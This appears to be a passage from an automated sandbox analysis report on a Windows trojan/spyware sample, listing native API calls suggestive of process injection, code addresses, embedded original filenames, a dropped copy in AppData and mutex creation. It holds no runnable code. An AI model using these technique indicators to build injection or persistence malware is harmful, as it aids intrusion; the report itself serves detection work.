Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092CC0 NtQueryVirtualMemory,	9_2_01092CC0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092CF0 NtOpenProcess,	9_2_01092CF0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092F30 NtCreateSection,	9_2_01092F30
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092F60 NtCreateProcessEx,	9_2_01092F60
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092F90 NtProtectVirtualMemory,	9_2_01092F90
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092FA0 NtQuerySection,	9_2_01092FA0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092FB0 NtResumeThread,	9_2_01092FB0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092FE0 NtCreateFile,	9_2_01092FE0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092E30 NtWriteVirtualMemory,	9_2_01092E30
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092E80 NtReadVirtualMemory,	9_2_01092E80
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092EA0 NtAdjustPrivilegesToken,	9_2_01092EA0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092EE0 NtQueueApcThread,	9_2_01092EE0

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 0_2_016B4218	0_2_016B4218
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 0_2_016B6F92	0_2_016B6F92
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 0_2_016BD424	0_2_016BD424
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 0_2_07734678	0_2_07734678
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 0_2_07734668	0_2_07734668
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 0_2_07732608	0_2_07732608
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 0_2_0773A680	0_2_0773A680
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 0_2_07732A40	0_2_07732A40
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 0_2_07734240	0_2_07734240
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 0_2_07732A30	0_2_07732A30
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 0_2_077321D0	0_2_077321D0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 0_2_094D0FE8	0_2_094D0FE8
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 0_2_094D0FF8	0_2_094D0FF8
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_00418A73	9_2_00418A73
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0042F123	9_2_0042F123
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0041029B	9_2_0041029B
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_004102A3	9_2_004102A3
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_004023A9	9_2_004023A9
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_004023B0	9_2_004023B0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_00416C6E	9_2_00416C6E
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_00416C73	9_2_00416C73
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_004104C3	9_2_004104C3
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0040E4C9	9_2_0040E4C9
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0040E4D3	9_2_0040E4D3
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_00414583	9_2_00414583
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0040E617	9_2_0040E617
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0040E623	9_2_0040E623
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_004026C0	9_2_004026C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_004026BC	9_2_004026BC
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_00402FC0	9_2_00402FC0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_00402FBB	9_2_00402FBB
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01050100	9_2_01050100
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010FA118	9_2_010FA118
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E8158	9_2_010E8158
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0109516C	9_2_0109516C
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104F172	9_2_0104F172
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0112B16B	9_2_0112B16B
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0106B1B0	9_2_0106B1B0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011201AA	9_2_011201AA
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011181CC	9_2_011181CC
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010670C0	9_2_010670C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0110F0CC	9_2_0110F0CC
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0111F0E0	9_2_0111F0E0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011170E9	9_2_011170E9
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0111132D	9_2_0111132D
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0111A352	9_2_0111A352
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104D34C	9_2_0104D34C
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010A739A	9_2_010A739A
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011203E6	9_2_011203E6
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0106E3F0	9_2_0106E3F0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01100274	9_2_01100274
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010652A0	9_2_010652A0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107B2C0	9_2_0107B2C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E02C0	9_2_010E02C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011012ED	9_2_011012ED
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01060535	9_2_01060535
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01117571	9_2_01117571
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01120591	9_2_01120591
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010FD5B0	9_2_010FD5B0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0111F43F	9_2_0111F43F
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01112446	9_2_01112446
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01051460	9_2_01051460
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0110E4F6	9_2_0110E4F6
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01084750	9_2_01084750
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01060770	9_2_01060770
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0111F7B0	9_2_0111F7B0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105C7C0	9_2_0105C7C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011116CC	9_2_011116CC
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107C6E0	9_2_0107C6E0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01069950	9_2_01069950
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107B950	9_2_0107B950
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01076962	9_2_01076962
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010629A0	9_2_010629A0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0112A9A6	9_2_0112A9A6
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010CD800	9_2_010CD800
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01062840	9_2_01062840
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0106A840	9_2_0106A840
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010468B8	9_2_010468B8
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010638E0	9_2_010638E0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108E8F0	9_2_0108E8F0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0111AB40	9_2_0111AB40
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0111FB76	9_2_0111FB76
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107FB80	9_2_0107FB80
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01116BD7	9_2_01116BD7
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0109DBF9	9_2_0109DBF9
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D5BF0	9_2_010D5BF0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01117A46	9_2_01117A46
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0111FA49	9_2_0111FA49
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D3A6C	9_2_010D3A6C
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105EA80	9_2_0105EA80
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010FDAAC	9_2_010FDAAC
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010A5AA0	9_2_010A5AA0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0110DAC6	9_2_0110DAC6
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0106AD00	9_2_0106AD00
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01063D40	9_2_01063D40
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01111D5A	9_2_01111D5A
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01117D73	9_2_01117D73
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01078DBF	9_2_01078DBF
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107FDC0	9_2_0107FDC0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105ADE0	9_2_0105ADE0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01060C00	9_2_01060C00
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D9C32	9_2_010D9C32
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01100CB5	9_2_01100CB5
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0111FCF2	9_2_0111FCF2
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01050CF2	9_2_01050CF2
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0111FF09	9_2_0111FF09
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010A2F28	9_2_010A2F28
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01080F30	9_2_01080F30
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D4F40	9_2_010D4F40
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01061F92	9_2_01061F92
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0111FFB1	9_2_0111FFB1
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010DEFA0	9_2_010DEFA0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01052FC8	9_2_01052FC8
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0106CFE0	9_2_0106CFE0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0111EE26	9_2_0111EE26
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01060E59	9_2_01060E59
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0111CE93	9_2_0111CE93
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01072E90	9_2_01072E90
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01069EB0	9_2_01069EB0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0111EEDB	9_2_0111EEDB
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 10_2_00E44218	10_2_00E44218
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 10_2_00E4D424	10_2_00E4D424
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 10_2_06B00FF8	10_2_06B00FF8
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 10_2_06B00FE8	10_2_06B00FE8
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 10_2_07142608	10_2_07142608
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 10_2_07144678	10_2_07144678
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 10_2_07144668	10_2_07144668
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 10_2_07149B92	10_2_07149B92
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 10_2_07142A30	10_2_07142A30
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 10_2_07144240	10_2_07144240
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 10_2_07142A40	10_2_07142A40
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 10_2_071421D0	10_2_071421D0
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011A0100	16_2_011A0100
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011F6000	16_2_011F6000
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_012302C0	16_2_012302C0
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011B0535	16_2_011B0535
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011D4750	16_2_011D4750
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011B0770	16_2_011B0770
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011AC7C0	16_2_011AC7C0
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011CC6E0	16_2_011CC6E0
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011C6962	16_2_011C6962
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011B29A0	16_2_011B29A0
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011B2840	16_2_011B2840
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011BA840	16_2_011BA840
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011E8890	16_2_011E8890
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011968B8	16_2_011968B8
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011DE8F0	16_2_011DE8F0
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011AEA80	16_2_011AEA80
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011BAD00	16_2_011BAD00
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011BED7A	16_2_011BED7A
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011C8DBF	16_2_011C8DBF
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011B8DC0	16_2_011B8DC0
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011AADE0	16_2_011AADE0
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011B0C00	16_2_011B0C00
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011A0CF2	16_2_011A0CF2
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011D0F30	16_2_011D0F30
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011F2F28	16_2_011F2F28
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_01224F40	16_2_01224F40
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_0122EFA0	16_2_0122EFA0
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011A2FC8	16_2_011A2FC8
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011B0E59	16_2_011B0E59
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011C2E90	16_2_011C2E90
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_0119F172	16_2_0119F172
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011E516C	16_2_011E516C
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011BB1B0	16_2_011BB1B0
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_0119D34C	16_2_0119D34C
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011B33F3	16_2_011B33F3
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011B52A0	16_2_011B52A0
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011CB2C0	16_2_011CB2C0
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011CD2F0	16_2_011CD2F0
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011A1460	16_2_011A1460
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011B3497	16_2_011B3497
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011F74E0	16_2_011F74E0
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011BB730	16_2_011BB730
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011B9950	16_2_011B9950
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011CB950	16_2_011CB950
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011B5990	16_2_011B5990
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_0121D800	16_2_0121D800
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011B38E0	16_2_011B38E0
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011CFB80	16_2_011CFB80
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_01225BF0	16_2_01225BF0
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011EDBF9	16_2_011EDBF9
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_01223A6C	16_2_01223A6C
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011B3D40	16_2_011B3D40
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011CFDC0	16_2_011CFDC0
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_01229C32	16_2_01229C32
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011C9C20	16_2_011C9C20
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011B1F92	16_2_011B1F92
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011B9EB0	16_2_011B9EB0
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	Code function: 20_2_0400D47F	20_2_0400D47F
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	Code function: 20_2_0400D484	20_2_0400D484
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	Code function: 20_2_04006CD4	20_2_04006CD4
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	Code function: 20_2_04004CDA	20_2_04004CDA
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	Code function: 20_2_04004CE4	20_2_04004CE4
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	Code function: 20_2_04004E28	20_2_04004E28
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	Code function: 20_2_04004E34	20_2_04004E34
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	Code function: 20_2_04025934	20_2_04025934
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	Code function: 20_2_0400F284	20_2_0400F284
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	Code function: 20_2_04006AAC	20_2_04006AAC
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	Code function: 20_2_04006AB4	20_2_04006AB4

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: String function: 010DF290 appears 105 times
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: String function: 010A7E54 appears 96 times
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: String function: 010CEA12 appears 86 times
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: String function: 01095130 appears 36 times
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: String function: 0104B970 appears 268 times
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: String function: 0121EA12 appears 37 times
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: String function: 011F7E54 appears 97 times

Source: zE1VxVoZ3W.exe, 00000000.00000002.1658227143.00000000079C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs zE1VxVoZ3W.exe
Source: zE1VxVoZ3W.exe, 00000000.00000000.1594516937.0000000000F92000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameEJBjR.exe> vs zE1VxVoZ3W.exe
Source: zE1VxVoZ3W.exe, 00000000.00000002.1655393286.0000000005F60000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs zE1VxVoZ3W.exe
Source: zE1VxVoZ3W.exe, 00000000.00000002.1659332616.00000000081C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameEJBjR.exe> vs zE1VxVoZ3W.exe
Source: zE1VxVoZ3W.exe, 00000000.00000002.1625354881.00000000016FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs zE1VxVoZ3W.exe
Source: zE1VxVoZ3W.exe, 00000000.00000002.1631543870.0000000004419000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs zE1VxVoZ3W.exe
Source: zE1VxVoZ3W.exe, 00000000.00000002.1631543870.0000000004419000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs zE1VxVoZ3W.exe
Source: zE1VxVoZ3W.exe, 00000009.00000002.1994095406.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWINVER.EXEj% vs zE1VxVoZ3W.exe
Source: zE1VxVoZ3W.exe, 00000009.00000002.1994916242.000000000114D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs zE1VxVoZ3W.exe
Source: zE1VxVoZ3W.exe	Binary or memory string: OriginalFilenameEJBjR.exe> vs zE1VxVoZ3W.exe

Source: zE1VxVoZ3W.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@26/16@12/11

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe

File created: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1532:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7048:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6388:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1892:120:WilError_03

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe

File created: C:\Users\user\AppData\Local\Temp\tmp7D49.tmp

Jump to behavior

Source: zE1VxVoZ3W.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

